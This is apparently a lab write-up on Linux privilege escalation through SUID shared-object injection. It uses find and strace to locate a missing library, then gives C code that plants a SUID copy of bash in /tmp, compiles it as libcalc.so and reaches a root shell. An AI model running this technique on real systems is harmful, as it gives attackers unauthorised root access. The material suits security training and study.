HOMESERVICESBLOG

SUID

No Such File

When looking for file with SUID permissions I found an interesting file.

TCM@debian:~$ find / -type f -perm -04000 -ls 2>/dev/null
816078   12 -rwsr-sr-x   1 root     staff        9861 May 14  2017 /usr/local/bin/suid-so

Executing the file.

TCM@debian:~$ /usr/local/bin/suid-so
Calculating something, please wait...
[=====================================================================>] 99 %
Done.

Now we'll use strace to see what's going on behind the scenes.

TCM@debian:~$ strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file"
access("/etc/suid-debug", F_OK)         = -1 ENOENT (No such file or directory)
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY)      = 3
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib/libdl.so.2", O_RDONLY)       = 3
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/usr/lib/libstdc++.so.6", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib/libm.so.6", O_RDONLY)        = 3
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib/libgcc_s.so.1", O_RDONLY)    = 3
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib/libc.so.6", O_RDONLY)        = 3
-----> open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory) <-----

There are few No such file errors we can create a malicious file and place it anywhere where we have write access with the name of missing file. We have write access to the last folder so we'll create a file named libcalc.so.

#include <stdio.h>
#include <stdlib.h>

static void inject() __attribute__((constructor));

void inject() {
        system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}

Compile the file and place it on the location.

TCM@debian:~$ mkdir /home/user/.config
TCM@debian:~$ gcc -shared -fPIC /home/user/libcalc.c -o /home/user/.config/libcalc.so

Now execute the binary

TCM@debian:~$ /usr/local/bin/suid-so
Calculating something, please wait...
bash-4.1# whoami
root
PreviousRun SudoNextWindows Privilege Escalation

Last updated